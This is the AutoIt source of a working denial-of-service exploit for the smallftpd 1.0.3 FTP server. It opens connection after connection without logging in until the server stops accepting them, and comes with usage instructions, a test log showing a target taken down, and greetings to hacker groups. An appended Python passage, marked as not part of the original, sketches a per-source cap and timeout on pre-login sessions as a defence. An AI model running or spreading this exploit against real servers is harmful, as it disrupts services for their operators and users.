`#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=aas.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#cs
smallftpd 1.0.3.dos.au3
smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit;
This is a simple exploit written in AutoIt that crashes a remote/local smallftpd 1.0.3 FTP server.
To use the exploit, you have to compile it as a CUI application.
Official site of smallftpd 1.0.3 : =>
http://smallftpd.free.fr/
http://smallftpd.sourceforge.net/
http://sourceforge.net/projects/smallftpd/files/latest/download
=====================================================
Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit)
that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) From Win XP SP 2 (32 bit)(192.168.0.1) against Win XP SP 2 32 bit( 192.168.0.15)
that runs smallftpd 1.0.3.
Result: Remote denial of Service;App crashed.
=====================================================
Tested (local scope) from Win XP SP 2(32 bit) (192.168.0.1) against Windows 7 Ultimate SP 1 ( 192.168.0.15)
that runs smallftpd 1.0.3. (<- with XP SP3 compatible mode)
Result: The application didn't crash, but it is unable to accept any connection on port 21.
Here is the later testing result:
c:\dos\smalf\>ping 192.168.0.15
Обмен пакетами с 192.168.0.15 по 32 байт:
Ответ от 192.168.0.15: число байт=32 время=2мс TTL=128
Ответ от 192.168.0.15: число байт=32 время=5мс TTL=128cls
Статистика Ping для 192.168.0.15:
Пакетов: отправлено = 2, получено = 2, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
c:\dos\smalf\>telnet 192.168.0.15 21
220- smallftpd 1.0.3
220- check http://smallftpd.free.fr for more information
220 report bugs to [email protected]
¦
530 Not logged in.
c:\dos\smalf\>aas.exe 192.168.0.15 21
##############################################################
########## smallftpd 1.0.3 DENIAL OF SERVICE exploit #######
########## Usage: aas.exe REMOTEIP REMOTEPORT ##########
\\\\\\\\\\ HACKING IS LIFESTYLE! //////////
##############################################################
################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 40
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 80
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 120
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 160
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 200
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 240
--------------------------------------------------------------
##############################################################
########## Mission Completed! @267 ##########
TARGET =>ftp://192.168.0.15:21/ is * DOWN ! *
##############################################################
c:\dos\smalf\>telnet 192.168.0.15 21
Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 21: Сбой подключения
c:\dos\smalf\>telnet 192.168.0.15 21
Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 21: Сбой подключения
c:\dos\smalf\>ping 192.168.0.15
Обмен пакетами с 192.168.0.15 по 32 байт:
Ответ от 192.168.0.15: число байт=32 время=1мс TTL=128
Ответ от 192.168.0.15: число байт=32 время=1мс TTL=128
Статистика Ping для 192.168.0.15:
Пакетов: отправлено = 2, получено = 2, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
Минимальное = 1мсек, Максимальное = 1 мсек, Среднее = 1 мсек
Control-C
^C
c:\dos\smalf\>telnet 192.168.0.15 21
Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 21: Сбой подключения
c:\dos\smalf\>ipconfig|find /i "192.168"
IP-адрес . . . . . . . . . . . . : 192.168.0.1
Основной шлюз . . . . . . . . . . : 192.168.0.1
/AkaStep
#ce
#include <String.au3>
$f=_StringRepeat('#',10);
$USE_PROTO='ftp://';
$INVALIDIP='INVALID IP FORMAT';
$INVALIDPORT='INVALID PORT NUMBER!';
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _
$f & " Usage: " & _
@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10) & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if $CmdLine[0] <> 2 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf
$ip=StringMid($CmdLine[1],1,15);//255.255.255.255
$port=StringMid($CmdLine[2],1,5);//65535
validateall($ip,$port)
func validateall($ip,$port)
if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then
ConsoleWrite($INVALIDPORT);
Exit;
EndIf
TCPStartup();
$ip=TCPNameToIP($ip);
TCPShutdown();
$z=StringSplit($ip,Chr(46));//Asc('.')
if @error then
ConsoleWrite($INVALIDIP);
exit;
EndIf
for $x=0 to $z[0]
if Number($z[0]-1) <>3 Then
ConsoleWrite($INVALIDIP);
Exit
EndIf
if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then
ConsoleWrite($INVALIDIP);
exit;
EndIf
Next
$x=0;
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)
downit($ip,$port,$x)
EndFunc; =>validateall($ip,$port)
Func downit($ip,$port,$x)
$x+=1;
TCPStartup()
$socket_con = -1
$socket_con = TCPConnect($ip, $port)
If not @error Then
if Mod($x,40)=0 Then
ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF)
Sleep(Random(1000,1800,1));
EndIf
downit($ip,$port,$x)
Else
Beep(1000,1500)
ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _
_StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));
TCPShutdown();
exit;
EndIf
EndFunc; ==>downit($ip,$port,$x)
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
================================================
#ce
`
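
A defensive counterpart to the script above, as an added example that is not part of the original page or of smallftpd: the script opens TCP connections in a loop without logging in or closing them, so a listener can cap and expire not-yet-logged-in sessions per source. The class name, limits, session ids and sample events are assumptions constructed for illustration.

```python
from collections import defaultdict

class PreAuthGuard:
    """Caps sessions per source that are open but not logged in, and expires
    sessions that stay unauthenticated longer than `timeout` seconds."""
    def __init__(self, per_source_limit=10, timeout=30.0):
        self.limit = per_source_limit
        self.timeout = timeout
        self.pending = defaultdict(dict)   # src -> {session_id: opened_at}

    def on_open(self, ts, src, sid):
        """Return True to accept the connection, False to refuse it."""
        self.reap(ts)
        if len(self.pending[src]) >= self.limit:
            return False
        self.pending[src][sid] = ts
        return True

    def on_done(self, src, sid):
        """Call on successful login or on socket close."""
        self.pending[src].pop(sid, None)

    def reap(self, ts):
        """Drop and return (src, sid) pairs whose pre-login time exceeded the timeout."""
        expired = [(src, sid) for src, sess in self.pending.items()
                   for sid, opened in sess.items() if ts - opened > self.timeout]
        for src, sid in expired:
            del self.pending[src][sid]
        return expired

def replay(events, guard):
    """Feed (ts, src, sid, event) tuples to the guard; count refusals per source."""
    refused = defaultdict(int)
    for ts, src, sid, event in sorted(events):
        if event == "open":
            if not guard.on_open(ts, src, sid):
                refused[src] += 1
        else:                       # "auth" or "close"
            guard.on_done(src, sid)
    return dict(refused)

def sample_events():
    # Constructed data: one normal client, one source opening 267 idle sessions.
    normal = [(0.0, "192.0.2.10", 1, "open"), (0.4, "192.0.2.10", 1, "auth"),
              (8.0, "192.0.2.10", 1, "close")]
    flood = [(1.0 + i * 0.05, "192.0.2.66", 1000 + i, "open") for i in range(267)]
    late = [(20.0, "192.0.2.10", 2, "open")]   # normal client returns mid-flood
    return normal + flood + late
```

With the per-source cap in place, the flooding source is refused after its tenth idle session while the normal client can still connect, and the timeout releases the held slots afterwards.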